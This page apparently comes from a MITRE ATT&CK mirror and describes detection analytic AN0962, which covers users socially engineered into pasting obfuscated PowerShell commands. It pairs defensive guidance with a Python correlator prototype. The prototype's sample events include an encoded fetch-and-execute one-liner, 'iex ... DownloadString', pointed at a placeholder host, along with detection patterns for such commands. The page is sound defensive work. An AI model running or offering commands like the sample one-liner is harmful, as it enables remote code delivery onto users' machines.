AN0962: Analytic 0962
A user is socially engineered (web page, email, document) to open Run/PowerShell/CMD and paste an obfuscated one-liner. The chain is: (1) user context active in a browser/email/office app → (2) process creation of a command interpreter with suspicious arguments (base64/Invoke-Expression/web download/pipeline to shell) → (3) optional file drop in %TEMP% or %APPDATA% → (4) outbound network connection to an external domain. Events are correlated within a short window and with consistent user/session.
Analyst context for executives and security teams
This analytic describes a Windows user being tricked into pasting an obfuscated command into Run, PowerShell, or CMD, followed by suspicious command execution, possible file creation in user-writable locations, and outbound network activity. The business issue is not just the command line itself; it is whether the organization can connect user activity, process creation, file writes, and network egress quickly enough to distinguish social-engineering-driven execution from normal administrative activity.
Executive priority
Prioritize this as a validation point for endpoint and SOC readiness on Windows. Leaders should ask whether telemetry from browsers, email or Office applications, command interpreters, user-writable directories, and outbound connections can be correlated by user and session within a short time window. This supports incident triage, user-focused response decisions, control evidence for audits, and investment decisions around endpoint logging, managed detection, and phishing-resistant operational controls.
Technical view
For SOC and detection teams, the supplied analytic is a correlation pattern: active user context in a browser, email, or Office application; near-term process creation of PowerShell or CMD (or of an interpreter launched from the Run dialog) with suspicious arguments such as encoded content (-EncodedCommand and its abbreviations), expression invocation (Invoke-Expression or iex), web download behavior, or piping into a shell; optional file creation under %TEMP% or %APPDATA%; and an outbound connection to an external domain. Note that Run is a dialog, not a process: a command pasted into Win+R is started by explorer.exe, so the interpreter's parent is usually explorer.exe rather than the application that delivered the lure, and the browser or email context has to come from same-session, same-window correlation rather than from the parent process alone. Validate that Windows process creation, command-line arguments, parent or initiating process context, user/session identifiers, file creation events, and network destination data are available and joinable within the detection window, and that encoded command lines can be decoded before pattern matching, since the download and invocation features often appear only in the decoded payload. Because ATT&CK provides no separate official detection text or relationships for this object, tuning should be based on local administrative patterns and known business workflows.
Likely telemetry
- Windows process creation events with full command-line arguments
- Parent-process context for the interpreter (often explorer.exe when the Run dialog is used) together with recent activity from the browser, email client, or Office application in the same user session
- User and session identifiers that allow short-window correlation
- File creation telemetry for %TEMP% and %APPDATA%
- Endpoint or network telemetry showing outbound connections to external domains
Detection direction
- Validate correlation across user context, command interpreter execution, file creation, and outbound network activity rather than alerting on a single weak indicator.
- Tune for suspicious command-line features noted in the analytic, including encoded content, expression invocation, web download behavior, and shell pipelines.
- Review false positives from administrators, helpdesk scripts, software installers, and legitimate automation that may use PowerShell or CMD with complex arguments.
- Check blind spots where command-line logging is disabled, parent process context is missing, user/session identifiers are inconsistent, or network telemetry cannot be tied back to the endpoint process.
- Because no ATT&CK relationship context is supplied, do not assume a specific tactic, actor, campaign, or malware family; use local enrichment and incident evidence.
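The following is an added example, not MITRE or Glexia code, that prototypes the correlation described in the technical view and the detection direction above over constructed Sysmon-style events. The event field names, the suspicious-argument patterns, the ten-minute window, the set of "user application" images and all sample events (including the TEST-NET addresses) are assumptions chosen to mirror the analytic; a real deployment would read these from the SIEM. It decodes a -EncodedCommand payload before matching, requires browser/Office context in the same session plus external egress from the interpreter process before alerting, and shows that an SCCM-driven script and a WinRM-delivered encoded command do not fire on their own.

```python
"""Prototype AN0962 correlator over constructed Sysmon-style events (added example)."""
import base64
import ipaddress
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed correlation window around the interpreter launch
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
USER_APPS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "winword.exe", "excel.exe"}
USER_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\")  # %TEMP% and %APPDATA%
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# One pattern per feature named in the analytic. "encoded" captures the base64 blob
# after -e / -ec / -enc / -EncodedCommand so it can be decoded and re-scanned.
FEATURES = {
    "encoded": re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})"),
    "iex": re.compile(r"(?i)\b(?:invoke-expression|iex)\b"),
    "download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|net\.webclient"),
    "pipe_to_shell": re.compile(r"(?i)\|\s*(?:iex|invoke-expression|cmd|powershell|pwsh)\b"),
}


def decode_encoded(cmdline):
    """Return the UTF-16LE text behind a -EncodedCommand blob, or '' if absent/undecodable."""
    m = FEATURES["encoded"].search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def command_features(cmdline):
    """Feature names found in the raw command line and, if present, its decoded payload."""
    texts = [cmdline, decode_encoded(cmdline)]
    return sorted({name for name, rx in FEATURES.items() for t in texts if t and rx.search(t)})


def is_external(ip):
    """External means not in the assumed internal ranges (not ipaddress.is_global, which
    treats the TEST-NET sample addresses below as non-global)."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL)


def base(image):
    return image.rsplit("\\", 1)[-1].lower()


def correlate(events, window=WINDOW):
    """One alert per interpreter launch that completes the chain within one user session.
    Events are keyed by (user, logon id); a real implementation should also key the
    later stages on ProcessGuid rather than pid to survive pid reuse."""
    by_session = {}
    for e in events:
        by_session.setdefault((e["user"], e["logon"]), []).append(e)
    alerts = []
    for (user, logon), evs in by_session.items():
        evs.sort(key=lambda e: e["t"])
        for e in evs:
            if e["type"] != "ProcessCreate" or base(e["image"]) not in INTERPRETERS:
                continue
            feats = command_features(e["cmd"])
            if not feats:  # (2) no suspicious argument, so no chain to build
                continue
            t0 = e["t"]
            # (1) browser/mail/office activity in the same session shortly before the launch
            context = [x for x in evs if base(x["image"]) in USER_APPS and t0 - window <= x["t"] <= t0]
            later = [x for x in evs if t0 <= x["t"] <= t0 + window and x.get("pid") == e["pid"]]
            # (3) optional drop into a user-writable directory by the interpreter process
            drops = [x["path"] for x in later if x["type"] == "FileCreate"
                     and any(d in x["path"].lower() for d in USER_DIRS)]
            # (4) outbound connection from that process to a non-internal address
            egress = [x["dst"] for x in later if x["type"] == "NetworkConnect" and is_external(x["dst"])]
            if context and egress:
                alerts.append({"user": user, "logon": logon, "pid": e["pid"], "parent": base(e["parent"]),
                               "features": feats, "decoded": decode_encoded(e["cmd"]),
                               "drops": drops, "egress": egress})
    return alerts


def ev(t, kind, user, logon, image, pid, **extra):
    return {"t": t, "type": kind, "user": user, "logon": logon, "image": image, "pid": pid, **extra}


# Constructed sample data. example.invalid and 203.0.113.0/24 (TEST-NET-3) are placeholders.
PAYLOAD = "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/s')"
BLOB = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
ADMIN_BLOB = base64.b64encode("Get-Service | Out-File C:\\Temp\\svc.txt".encode("utf-16-le")).decode()
T = datetime(2026, 1, 15, 9, 0, 0)
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    # alice: browser active, then a pasted one-liner via the Run dialog (parent explorer.exe)
    ev(T, "NetworkConnect", "alice", "0x1a2b3c", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", 4120, dst="203.0.113.10"),
    ev(T + timedelta(minutes=4), "ProcessCreate", "alice", "0x1a2b3c", PS, 5520,
       parent="C:\\Windows\\explorer.exe", cmd=f"powershell -w hidden -nop -enc {BLOB}"),
    ev(T + timedelta(minutes=4, seconds=2), "FileCreate", "alice", "0x1a2b3c", PS, 5520, path="C:\\Users\\alice\\AppData\\Roaming\\svc.exe"),
    ev(T + timedelta(minutes=4, seconds=5), "NetworkConnect", "alice", "0x1a2b3c", PS, 5520, dst="203.0.113.7"),
    # bob: SCCM-driven inventory script, complex arguments but no suspicious feature
    ev(T + timedelta(hours=1), "ProcessCreate", "bob", "0x9f", PS, 6100, parent="C:\\Windows\\CCM\\CcmExec.exe",
       cmd="powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\Scripts\\inventory.ps1"),
    ev(T + timedelta(hours=1, seconds=3), "NetworkConnect", "bob", "0x9f", PS, 6100, dst="10.20.0.5"),
    # carol: encoded command delivered over WinRM, no user-app context, internal egress only
    ev(T + timedelta(hours=2), "ProcessCreate", "carol", "0x2c", PS, 7010, parent="C:\\Windows\\System32\\wsmprovhost.exe",
       cmd=f"powershell -enc {ADMIN_BLOB}"),
    ev(T + timedelta(hours=2, seconds=1), "NetworkConnect", "carol", "0x2c", PS, 7010, dst="10.20.0.9"),
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a)
```

Only alice's session produces an alert: the raw command line shows only the "encoded" feature, and the download and invocation features surface after decoding, which is why decoding before matching matters. Carol's encoded command and bob's bypass script each carry one weak indicator but lack the user-application context and external egress the chain requires.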
Mitigation priorities
- Ensure Windows endpoint logging captures process creation with command-line detail and sufficient parent-process context.
- Improve correlation between endpoint, identity/session, file, and network telemetry in SIEM or managed detection workflows.
- Restrict or monitor risky command interpreter use where business operations allow, especially for non-administrative users.
- Harden user-facing social-engineering entry points through awareness, email/web controls, and safe handling guidance without relying on training alone.
- Prepare incident response playbooks for suspected user-pasted command execution, including endpoint containment, user interview, artifact collection, and review of outbound destinations.
Analyst notes and limits
This is a detection analytic, not a technique object. Its value is in testing whether the organization can see and correlate a socially engineered Windows command-execution chain. The supplied object does not specify ATT&CK tactics and provides no related objects, so this take stays focused on defensive validation rather than attribution or broader campaign context.
Official detection text is not provided, and no relationships are supplied. The object only supports Windows-specific discussion. Local environment baselines, approved administrative tooling, logging configuration, and network architecture are required to determine alert thresholds and response severity.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 58505aa10817… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] mitre-attack AN0962 (source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.